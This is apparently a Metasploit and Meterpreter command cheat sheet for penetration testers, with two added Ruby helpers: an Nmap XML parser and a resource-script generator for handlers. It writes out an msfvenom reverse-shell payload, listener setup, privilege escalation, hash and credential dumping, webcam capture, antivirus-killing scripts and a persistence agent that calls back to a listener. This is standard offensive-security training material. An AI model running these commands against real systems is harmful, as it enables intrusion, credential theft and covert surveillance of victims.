Metasploit framework
To run Metasploit, use the following command:
$ msfconsole
To start Metasploit and have it execute the commands in a resource script file, use:
$ msfconsole -r test.rc
Using the database
In Kali Linux, you will need to start the PostgreSQL server before using the database:
$ systemctl start postgresql
After starting PostgreSQL, you will need to create and initialize the msf database with msfdb init:
$ msfdb init
If you have just written a new exploit module and want msfconsole to pick it up, run reload_all at the msf > prompt (or simply restart the console); the database is not involved in loading modules. The following is often quoted for the same purpose, but it drops and re-creates the database, destroying every host, service, credential and loot record stored so far, so use it only when you really want an empty database:
$ service postgresql restart && msfdb reinit
Then, start the console:
$ msfconsole -q
The -q flag only suppresses the startup banner (quiet mode); it is not a debug mode. If a newly written module fails to load, msfconsole prints a warning naming the file and the Ruby error at startup (and reload_all does the same), with or without -q.
More database-related commands
msf > db_status: Confirms that Metasploit is connected to the database.
msf > workspace: Lists the workspaces and marks the currently selected one.
msf > workspace [name]: Switches to the named workspace.
msf > workspace -a [name]: Adds a workspace with that name.
msf > workspace -d [name]: Deletes the named workspace together with the data stored in it.
msf > db_import [file path]: Imports the results of an earlier scan (Nmap XML and several other formats), for example db_import /root/msfu/nmapScan
msf > db_nmap [nmap arguments]: Runs Nmap and stores the results in the current workspace, for example db_nmap -A 172.16.194.134
msf > hosts: Lists the hosts recorded after a scan.
msf > services: Lists the services found after a scan.
msf > creds: Lists any credentials found, for example after a brute-force scan.
msf > loot: Lists the loot collected, such as hash dumps from a system you have already compromised.
msf > db_export -f [format] [file path]: Exports the current workspace, for example db_export -f xml /root/msfu/Exported.xml
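Added example (not from the original page or the Metasploit project): the Ruby script below does offline what db_import does with an Nmap XML report, turning it into the hosts and services tables that the hosts and services commands print. The scan report embedded in the script is constructed for this example (invented addresses, banners and OS match, not a real scan), and REXML from the Ruby standard library does the parsing. Only open ports are kept as services, which is a choice made here rather than a statement about how Metasploit's importer behaves.

```ruby
require 'rexml/document'

# Constructed sample of Nmap XML output (`nmap -sV -O -oX scan.xml ...`).
# The addresses, banners and OS match are invented for this example.
SAMPLE_NMAP_XML = <<~XML
  <?xml version="1.0"?>
  <nmaprun scanner="nmap" args="nmap -sV -O -oX scan.xml 172.16.194.0/24" version="7.94">
    <host>
      <status state="up" reason="arp-response"/>
      <address addr="172.16.194.134" addrtype="ipv4"/>
      <address addr="00:0C:29:AA:BB:CC" addrtype="mac"/>
      <hostnames><hostname name="metasploitable" type="PTR"/></hostnames>
      <ports>
        <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh" product="OpenSSH" version="4.7p1"/></port>
        <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http" product="Apache httpd" version="2.2.8"/></port>
        <port protocol="tcp" portid="23"><state state="closed" reason="reset"/></port>
      </ports>
      <os><osmatch name="Linux 2.6.9 - 2.6.33" accuracy="100"/></os>
    </host>
    <host>
      <status state="down" reason="no-response"/>
      <address addr="172.16.194.135" addrtype="ipv4"/>
    </host>
  </nmaprun>
XML

Host    = Struct.new(:address, :mac, :name, :state, :os)
Service = Struct.new(:host, :port, :proto, :state, :name, :info)

# Attribute value of an element that may be nil (missing in the report).
def attr_of(element, name)
  element && element.attributes[name]
end

# Parse Nmap XML into the two tables that msfconsole's `hosts` and
# `services` commands show after `db_import`. Only open ports become
# services; closed and filtered ports are dropped (a choice for this example).
def parse_nmap_xml(xml)
  doc = REXML::Document.new(xml)
  hosts = []
  services = []
  doc.elements.each('nmaprun/host') do |host_el|
    ipv4 = host_el.elements["address[@addrtype='ipv4']"]
    next unless ipv4 # skip entries without an IPv4 address
    addr = ipv4.attributes['addr']
    hosts << Host.new(
      addr,
      attr_of(host_el.elements["address[@addrtype='mac']"], 'addr'),
      attr_of(host_el.elements['hostnames/hostname'], 'name'),
      attr_of(host_el.elements['status'], 'state') || 'unknown',
      attr_of(host_el.elements['os/osmatch'], 'name')
    )
    host_el.elements.each('ports/port') do |port_el|
      state = attr_of(port_el.elements['state'], 'state')
      next unless state == 'open'
      svc = port_el.elements['service']
      info = [attr_of(svc, 'product'), attr_of(svc, 'version')].compact.join(' ')
      services << Service.new(addr, port_el.attributes['portid'].to_i,
                              port_el.attributes['protocol'], state,
                              attr_of(svc, 'name'), info)
    end
  end
  { hosts: hosts, services: services }
end

# Render the result roughly the way the msfconsole tables look.
def render(result)
  out = +"Hosts\n"
  result[:hosts].each do |h|
    out << format("%-16s %-18s %-15s %-5s %s\n", h.address, h.mac, h.name, h.state, h.os)
  end
  out << "\nServices\n"
  result[:services].each do |s|
    out << format("%-16s %-6d %-4s %-6s %-8s %s\n", s.host, s.port, s.proto, s.state, s.name, s.info)
  end
  out
end

puts render(parse_nmap_xml(SAMPLE_NMAP_XML)) if __FILE__ == $PROGRAM_NAME
```

Replace SAMPLE_NMAP_XML with File.read of a real -oX report to use it on your own scans; a host that Nmap reports as down still appears in the hosts table with state down, which is also how such hosts show up after db_import.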
Getting around
msf > search: Locates modules matching the search criteria you provide (run help search for the full syntax).
msf > search [any keyword]: For example, search apache version 2.3
msf > grep [pattern] [command]: Filters the output of another console command, for example grep http search apache
- Search keywords:
app: Modules that are client or server attacks
author: Modules written by this author
bid: Modules with a matching Bugtraq ID
cve: Modules with a matching CVE ID
edb: Modules with a matching Exploit-DB ID
name: Modules with a matching descriptive name
platform: Modules affecting this platform
ref: Modules with a matching reference
type: Modules of a specific type (exploit, auxiliary, post, and so on)
- Examples:
msf > search cve:2009 type:exploit app:client
msf > search name:mysql
msf > search platform:windows
msf > search type:auxiliary
- More commands:
msf > help: Lists the available commands
msf > back: Leaves the current module context and returns to the msf > prompt
msf > exit: Exits msfconsole
Using modules
msf > use [module name]: Selects a module so that it can be configured and run. For example, use dos/windows/smb/ms09_001_write
msf > show: Shows information about a particular kind of item in Metasploit; entering show on its own at the msfconsole prompt displays every module.
msf > show options: Shows the options of the current module.
msf > show auxiliary: Displays a list of all of the available auxiliary modules within Metasploit.
msf > show exploits: Lists all exploits contained in the framework.
msf > show payloads: Displays the available payloads (all of them from the msf > prompt, or only those compatible with the currently selected module).
msf > show targets: Displays which targets are supported within the context of an exploit module.
msf > show advanced: Shows the advanced options if you wish to fine-tune an exploit further.
msf > show encoders: Displays a list of the encoders that are available within msfconsole.
msf > show nops: Displays the NOP generators that Metasploit has to offer.
msf > info [module name]: Provides detailed information about a module. For example, info exploit/windows/http/apache_chunked
msf > check: Verifies whether the target is vulnerable without exploiting it; the module options must be set first, and not every module implements it.
msf > set: Configures an option of the current module. For example, set RHOST 172.16.194.134
msf > setg: Sets a global option that is inherited by every module within msfconsole. For example, setg LHOST 10.0.0.100
msf > unset: Removes an option that was previously configured with set; unset all removes every assigned option. For example, unset THREADS
msf > save: Saves your current environment and settings so that they are restored the next time msfconsole starts.
msf > jobs [option]: Lists and terminates background jobs. Use jobs -h to get the available options. For example, jobs -l
Miscellaneous
msf > load [plugin name]: Loads a plugin from Metasploit's plugin directory. Arguments are passed as key=val on the command line. For example, load pcap_log
msf > unload [plugin name]: Unloads a previously loaded plugin and removes any commands it added. For example, unload pcap_log
msf > loadpath [module path]: Loads a third-party module tree from the given directory, which must be laid out like Metasploit's own modules directory (type/platform/...), so you can point Metasploit at your own 0-day exploits, encoders, payloads, and so on. For example, loadpath exploit/windows/test/test_module
msf > connect [host] [port]: Similar to netcat; useful for banner grabbing and interacting with a service by hand. Both the host and the port are required, for example connect 192.168.1.10 80 to talk to the web server on that host.
msfvenom
msfvenom can be used, for example, to generate a reverse TCP Meterpreter payload for Windows as a standalone executable, keeping the null byte out of the encoded output:
$ msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 -b "\x00" -f exe -o Meterpreter.exe
- Platforms: The following are the platform values that we can use (each capitalized name and its lowercase form are equivalent): Cisco or cisco, OSX or osx, Solaris or solaris, BSD or bsd, OpenBSD or openbsd, hardware, Firefox or firefox, BSDi or bsdi, NetBSD or netbsd, NodeJS or nodejs, FreeBSD or freebsd, Python or python, AIX or aix, JavaScript or javascript, HPUX or hpux, PHP or php, Irix or irix, Unix or unix, Linux or linux, Ruby or ruby, Java or java, Android or android, Netware or netware, Windows or windows, mainframe, multi.
- Executable formats: The following are the executable formats that we can use: asp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war.
- Transform formats: The following are the transform formats that we can use: bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript.
Listener scripting
$ touch script.rc
$ echo use exploit/multi/handler >> script.rc
$ echo set PAYLOAD windows/meterpreter/reverse_tcp >> script.rc
$ echo set LHOST 192.168.0.114 >> script.rc
$ echo set ExitOnSession false >> script.rc
$ echo exploit -j -z >> script.rc
$ msfconsole -r script.rc
Here ExitOnSession false keeps the handler listening after the first session arrives, -j runs the handler as a background job, and -z stops msfconsole from automatically interacting with each new session.
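Added example (not from the original page or the Metasploit project): a Ruby script that generates a resource script like the one above, but for several handlers at once, and validates the listener address, ports and payload names so that a bad value cannot smuggle an extra console command into the file. The address, ports and payload names in the usage block are assumed values for illustration; the generated file is meant to be run with msfconsole -q -r handlers.rc.

```ruby
require 'ipaddr'

# Module names in Metasploit are lowercase path segments separated by
# slashes; anything else (spaces, newlines, semicolons) is rejected so a
# value can never terminate the `set` line and inject another command.
PAYLOAD_NAME = %r{\A[a-z0-9_]+(/[a-z0-9_]+)+\z}

# Build the text of a msfconsole resource script that starts one background
# handler per (port, payload) pair, all calling back to the same LHOST.
def build_handler_rc(lhost:, listeners:)
  ip = IPAddr.new(lhost) # raises IPAddr::InvalidAddressError on garbage
  raise ArgumentError, 'no listeners given' if listeners.empty?

  lines = ['# generated handler script; run with: msfconsole -q -r handlers.rc',
           "setg LHOST #{ip}"] # global, inherited by every handler below
  listeners.each do |port, payload|
    unless port.is_a?(Integer) && port.between?(1, 65_535)
      raise ArgumentError, "bad port #{port.inspect}"
    end
    unless payload.is_a?(String) && payload.match?(PAYLOAD_NAME)
      raise ArgumentError, "bad payload name #{payload.inspect}"
    end
    lines += ['use exploit/multi/handler',
              "set PAYLOAD #{payload}",
              "set LPORT #{port}",
              'set ExitOnSession false', # keep listening after the first session
              'exploit -j -z']           # run as a job, do not auto-interact
  end
  lines << 'jobs -l' # show the running handlers once the script finishes
  lines.join("\n") + "\n"
end

if __FILE__ == $PROGRAM_NAME
  # Assumed values for illustration only.
  puts build_handler_rc(lhost: '192.168.0.114',
                        listeners: [[4444, 'windows/meterpreter/reverse_tcp'],
                                    [4445, 'linux/x64/meterpreter/reverse_tcp']])
end
```

Redirect the output to handlers.rc and pass it to msfconsole -r; because each handler is started with -j, the console prompt comes back immediately and jobs -l at the end of the script confirms that every listener is up.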
Meterpreter
msf > sessions [options or ID]: Lists, interacts with, and kills spawned sessions. The sessions can be shells, Meterpreter sessions, VNC sessions, and so on (use sessions -h to get help).
meterpreter > background: Sends the current Meterpreter session to the background and returns you to the msf prompt.
meterpreter > getuid: Displays the user account that the Meterpreter server is running as on the host.
meterpreter > sysinfo: Displays the victim's OS information.
meterpreter > cd: Changes the current directory on the compromised system.
meterpreter > ls: Lists the current directory's contents.
meterpreter > pwd: Prints the current directory on the compromised system.
meterpreter > ps: Displays a list of running processes on the target.
meterpreter > run post/windows/manage/migrate: Migrates the Meterpreter server into another process on the victim.
meterpreter > use priv: Loads the priv extension, which provides getsystem; current Windows Meterpreter builds load it automatically, so this is only needed on old ones.
meterpreter > getsystem: Attempts to elevate your privileges to SYSTEM using its built-in techniques.
If you get the error priv_elevate_getsystem: Operation failed: Access is denied, then follow these steps:
meterpreter > background
Option 1: let Metasploit suggest local exploits that match the session's OS and patch level:
msf > use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > show options
msf post(local_exploit_suggester) > set SESSION 1
msf post(local_exploit_suggester) > run
Option 2: pick a Windows local exploit yourself:
msf > use exploit/windows/local/ followed by the Tab key: Lists all of the Windows local exploits.
msf > use exploit/windows/local/ms10_015_kitrap0d: We've chosen one exploit from the list; configure it with the session to escalate and a listener port other than the one the existing session's handler is using, and run it as follows:
msf exploit(ms10_015_kitrap0d) > show options
msf exploit(ms10_015_kitrap0d) > set SESSION 1
msf exploit(ms10_015_kitrap0d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.1.100
msf exploit(ms10_015_kitrap0d) > set LPORT 4445
msf exploit(ms10_015_kitrap0d) > exploit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM - Hooray
meterpreter > search: Provides a way of locating specific files on the target host. For example, search -f passwords*.txt
meterpreter > cat [file path]: Displays the content of the file given as an argument.
meterpreter > download [file path]: Downloads a file from the remote machine. Note the use of double backslashes when giving a Windows path. For example, download C:\\passwords.txt
meterpreter > upload [local file] [remote path]: Uploads a file to the target. For example, upload evil_trojan.exe c:\\windows\\system32
meterpreter > execute -f [program]: Runs a program on the target system (add -i to interact with it and -H to hide its window).
meterpreter > shell: Drops into a system shell (a Unix shell or a Windows command prompt) on the target.
meterpreter > run post/windows/gather/hashdump: A post module that dumps the contents of the SAM database.
meterpreter > ipconfig: Displays the network interfaces and addresses on the remote machine.
meterpreter > webcam_list: Displays the currently available webcams on the target host.
meterpreter > webcam_snap: Grabs a picture from a connected webcam on the target system and saves it to disk as a JPEG image. By default, the save location is the local current working directory with a randomized filename. For example, webcam_snap -i 1 -v false
meterpreter > python_import [local python file]: Imports a local Python file and executes it on the victim's machine (requires the python extension, loaded with load python). For example, python_import -f /root/readAutoLogonREG.py
meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24: Performs an ARP sweep of the given range from the compromised host to discover neighbouring machines.
meterpreter > run post/windows/gather/checkvm: Checks whether the compromised host is a virtual machine.
meterpreter > run post/windows/gather/credentials/credential_collector: Harvests password hashes and tokens on the compromised host.
meterpreter > run post/windows/gather/dumplinks: Parses the .lnk files in a user's recent documents, which could be useful for further information gathering.
meterpreter > run post/windows/gather/enum_applications: Enumerates the applications that are installed on the compromised host.
meterpreter > run post/windows/gather/enum_logged_on_users: Returns a list of current and recently logged-on users, along with their SIDs.
meterpreter > run post/windows/gather/enum_shares: Returns a list of both configured and recently used shares on the compromised system.
meterpreter > run post/windows/gather/enum_snmp: Enumerates the SNMP service configuration on the target, if present, including the community strings.
meterpreter > run post/windows/gather/hashdump: Dumps the local user accounts on the compromised host using the registry.
meterpreter > run post/windows/gather/usb_history: Enumerates the USB drive history on the compromised system.
The remaining entries are legacy Meterpreter scripts rather than post modules. Current Metasploit releases have deprecated or removed them in favour of post modules (for example post/windows/manage/enable_rdp replaces getgui -e, and exploit/windows/local/persistence replaces the persistence script), so expect them to be missing on a recent install.
meterpreter > run getcountermeasure: Checks the security configuration on the victim's system and can disable security measures such as A/V, the firewall, and much more.
meterpreter > run getgui -e: Enables RDP on a target system if it is disabled.
meterpreter > run gettelnet -e: Enables Telnet on the victim if it is disabled.
meterpreter > run killav: Disables most antivirus programs running as a service on a target.
meterpreter > run remotewinenum -u administrator -p password123 -t 10.0.0.100: Enumerates system information through wmic on the victim. Make a note of where the logs are stored.
meterpreter > run scraper: Grabs the system information, including the entire registry.
meterpreter > run winenum: A very detailed Windows enumeration tool. It dumps tokens, hashes, and much more.
meterpreter > run persistence -U -i 10 -p 443 -r 192.168.1.5: Configures a persistent Meterpreter agent that starts when a user logs on to the remote system (-U) and tries to connect back to our listener every 10 seconds (-i 10) at IP address 192.168.1.5 (-r) on port 443 (-p).